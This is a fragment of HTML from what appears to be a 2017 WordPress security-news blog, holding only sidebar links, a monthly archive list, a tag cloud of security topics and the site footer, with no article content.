href="/2017/12/04/hp-imc-plat-7-2-remote-code-execution/">HP iMC Plat 7.2 Remote Code Execution</a> </li> <li> <a href="/2017/12/04/tor-virtual-network-tunneling-tool-0-3-1-9/">TOR Virtual Network Tunneling Tool</a> </li> </ul> </aside> <aside id="archives-2" class="widget widget_archive"><h4 class="widget-title">Archives</h4> <ul> <li><a href='/2017/12/'>December 2017</a></li> <li><a href='/2017/11/'>November 2017</a></li> <li><a href='/2017/10/'>October 2017</a></li> <li><a href='/2017/09/'>September 2017</a></li> <li><a href='/2017/08/'>August 2017</a></li> <li><a href='/2017/07/'>July 2017</a></li> <li><a href='/2017/06/'>June 2017</a></li> <li><a href='/2017/05/'>May 2017</a></li> <li><a href='/2017/04/'>April 2017</a></li> <li><a href='/2017/03/'>March 2017</a></li> <li><a href='/2017/02/'>February 2017</a></li> <li><a href='/2017/01/'>January 2017</a></li> <li><a href='/2016/12/'>December 2016</a></li> </ul> </aside><aside id="tag_cloud-2" class="widget widget_tag_cloud"><h4 class="widget-title">Tags</h4><div class="tagcloud"><a href="/tag/android/" class="tag-cloud-link tag-link-719 tag-link-position-1" style="font-size: 11.189873417722pt;" aria-label="Android (133 items)">Android</a> <a href="/tag/code-scripting/" class="tag-cloud-link tag-link-38 tag-link-position-2" style="font-size: 12.784810126582pt;" aria-label="Code Scripting (166 items)">Code Scripting</a> <a href="/tag/cryptography/" class="tag-cloud-link tag-link-231 tag-link-position-3" style="font-size: 11.898734177215pt;" aria-label="Cryptography (147 items)">Cryptography</a> <a href="/tag/dos/" class="tag-cloud-link tag-link-84 tag-link-position-4" style="font-size: 10.303797468354pt;" aria-label="dos (118 items)">dos</a> <a href="/tag/encryption/" class="tag-cloud-link tag-link-552 tag-link-position-5" style="font-size: 8.8860759493671pt;" aria-label="Encryption (99 items)">Encryption</a> <a href="/tag/enterprise-security-weekly/" class="tag-cloud-link tag-link-463 tag-link-position-6" style="font-size: 8.8860759493671pt;" aria-label="Enterprise Security Weekly (98 items)">Enterprise Security Weekly</a> <a href="/tag/exploits/" class="tag-cloud-link tag-link-382 tag-link-position-7" style="font-size: 9.7721518987342pt;" aria-label="Exploits (110 items)">Exploits</a> <a href="/tag/framework/" class="tag-cloud-link tag-link-159 tag-link-position-8" style="font-size: 11.367088607595pt;" aria-label="Framework (138 items)">Framework</a> <a href="/tag/google/" class="tag-cloud-link tag-link-305 tag-link-position-9" style="font-size: 10.481012658228pt;" aria-label="google (123 items)">google</a> <a href="/tag/government/" class="tag-cloud-link tag-link-73 tag-link-position-10" style="font-size: 12.075949367089pt;" aria-label="Government (152 items)">Government</a> <a href="/tag/hacking/" class="tag-cloud-link tag-link-134 tag-link-position-11" style="font-size: 13.139240506329pt;" aria-label="hacking (173 items)">hacking</a> <a href="/tag/hacks/" class="tag-cloud-link tag-link-74 tag-link-position-12" style="font-size: 14.73417721519pt;" aria-label="Hacks (215 items)">Hacks</a> <a href="/tag/interview/" class="tag-cloud-link tag-link-135 tag-link-position-13" style="font-size: 8.5316455696203pt;" aria-label="interview (94 items)">interview</a> <a href="/tag/iot/" class="tag-cloud-link tag-link-226 tag-link-position-14" style="font-size: 8.1772151898734pt;" aria-label="IoT (90 items)">IoT</a> <a href="/tag/kali-linux/" class="tag-cloud-link tag-link-21 tag-link-position-15" style="font-size: 13.316455696203pt;" aria-label="Kali Linux (178 items)">Kali Linux</a> <a href="/tag/linux/" class="tag-cloud-link tag-link-63 tag-link-position-16" style="font-size: 19.518987341772pt;" aria-label="Linux (400 items)">Linux</a> <a href="/tag/mac/" class="tag-cloud-link tag-link-64 tag-link-position-17" style="font-size: 12.075949367089pt;" aria-label="Mac (150 items)">Mac</a> <a href="/tag/malware/" class="tag-cloud-link tag-link-75 tag-link-position-18" style="font-size: 20.405063291139pt;" aria-label="Malware (442 items)">Malware</a> <a href="/tag/microsoft/" class="tag-cloud-link tag-link-221 tag-link-position-19" style="font-size: 8.5316455696203pt;" aria-label="Microsoft (94 items)">Microsoft</a> <a href="/tag/mobile-security/" class="tag-cloud-link tag-link-44 tag-link-position-20" style="font-size: 11.189873417722pt;" aria-label="Mobile Security (133 items)">Mobile Security</a> <a href="/tag/networking/" class="tag-cloud-link tag-link-214 tag-link-position-21" style="font-size: 12.430379746835pt;" aria-label="Networking (157 items)">Networking</a> <a href="/tag/news/" class="tag-cloud-link tag-link-127 tag-link-position-22" style="font-size: 12.075949367089pt;" aria-label="News (149 items)">News</a> <a href="/tag/open-source/" class="tag-cloud-link tag-link-289 tag-link-position-23" style="font-size: 11.544303797468pt;" aria-label="Open Source (139 items)">Open Source</a> <a href="/tag/other/" class="tag-cloud-link tag-link-201 tag-link-position-24" style="font-size: 11.898734177215pt;" aria-label="Other (148 items)">Other</a> <a href="/tag/pauls-security-weekly/" class="tag-cloud-link tag-link-32 tag-link-position-25" style="font-size: 8.7088607594937pt;" aria-label="Paul's Security Weekly (96 items)">Paul's Security Weekly</a> <a href="/tag/paul-asadoorian/" class="tag-cloud-link tag-link-128 tag-link-position-26" style="font-size: 12.784810126582pt;" aria-label="paul asadoorian (165 items)">paul asadoorian</a> <a href="/tag/penetration-test/" class="tag-cloud-link tag-link-15 tag-link-position-27" style="font-size: 17.392405063291pt;" aria-label="Penetration Test (302 items)">Penetration Test</a> <a href="/tag/penetration-testing/" class="tag-cloud-link tag-link-48 tag-link-position-28" style="font-size: 15.79746835443pt;" aria-label="Penetration Testing (247 items)">Penetration Testing</a> <a href="/tag/powershell/" class="tag-cloud-link tag-link-512 tag-link-position-29" style="font-size: 11.544303797468pt;" aria-label="powershell (139 items)">powershell</a> <a href="/tag/privacy/" class="tag-cloud-link tag-link-89 tag-link-position-30" style="font-size: 17.215189873418pt;" aria-label="Privacy (293 items)">Privacy</a> <a href="/tag/python/" class="tag-cloud-link tag-link-291 tag-link-position-31" style="font-size: 16.329113924051pt;" aria-label="Python (262 items)">Python</a> <a href="/tag/python-script/" class="tag-cloud-link tag-link-45 tag-link-position-32" style="font-size: 9.9493670886076pt;" aria-label="Python Script (115 items)">Python Script</a> <a href="/tag/rblackhat-2/" class="tag-cloud-link tag-link-2857 tag-link-position-33" style="font-size: 20.227848101266pt;" aria-label="r/blackhat (440 items)">r/blackhat</a> <a href="/tag/ransomware/" class="tag-cloud-link tag-link-637 tag-link-position-34" style="font-size: 11.721518987342pt;" aria-label="ransomware (144 items)">ransomware</a> <a href="/tag/scanner/" class="tag-cloud-link tag-link-67 tag-link-position-35" style="font-size: 8.3544303797468pt;" aria-label="Scanner (93 items)">Scanner</a> <a href="/tag/security/" class="tag-cloud-link tag-link-34 tag-link-position-36" style="font-size: 16.506329113924pt;" aria-label="security (269 items)">security</a> <a href="/tag/security-tools/" class="tag-cloud-link tag-link-40 tag-link-position-37" style="font-size: 8pt;" aria-label="Security Tools (89 items)">Security Tools</a> <a href="/tag/security-weekly/" class="tag-cloud-link tag-link-35 tag-link-position-38" style="font-size: 13.670886075949pt;" aria-label="security weekly (184 items)">security weekly</a> <a href="/tag/tools/" class="tag-cloud-link tag-link-166 tag-link-position-39" style="font-size: 8.7088607594937pt;" aria-label="Tools (97 items)">Tools</a> <a href="/tag/uncategorized/" class="tag-cloud-link tag-link-51 tag-link-position-40" style="font-size: 13.848101265823pt;" aria-label="Uncategorized (190 items)">Uncategorized</a> <a href="/tag/vulnerabilities/" class="tag-cloud-link tag-link-76 tag-link-position-41" style="font-size: 22pt;" aria-label="Vulnerabilities (552 items)">Vulnerabilities</a> <a href="/tag/vulnerability-scanner/" class="tag-cloud-link tag-link-444 tag-link-position-42" style="font-size: 9.4177215189873pt;" aria-label="Vulnerability Scanner (105 items)">Vulnerability Scanner</a> <a href="/tag/webapps/" class="tag-cloud-link tag-link-14 tag-link-position-43" style="font-size: 19.518987341772pt;" aria-label="webapps (396 items)">webapps</a> <a href="/tag/web-security/" class="tag-cloud-link tag-link-90 tag-link-position-44" style="font-size: 17.924050632911pt;" aria-label="Web Security (319 items)">Web Security</a> <a href="/tag/windows/" class="tag-cloud-link tag-link-71 tag-link-position-45" style="font-size: 16.329113924051pt;" aria-label="Windows (262 items)">Windows</a></div> </aside></div><!-- #secondary --> </div><!-- #content --> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="scroll-container"> <a href="#" class="scrolltop"><i class="fa fa-chevron-up"></i></a> </div> <div class="site-info container"> <a href="" rel="nofollow">Proudly powered by WordPress</a><span class="sep"> | </span>Theme: <a href="" rel="nofollow">Amadeus</a> by Themeisle. </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- #page --> <script type='text/javascript' src='/wp-content/themes/amadeus/js/navigation.js?ver=20120206'></script> <script type='text/javascript' src='/wp-content/themes/amadeus/js/skip-link-focus-fix.js?ver=20130115'></script> <script type='text/javascript' src='/wp-includes/js/wp-embed.min.js?ver=88370d013aeb9857bb0ab9b2e0754621'></script> </body> </html>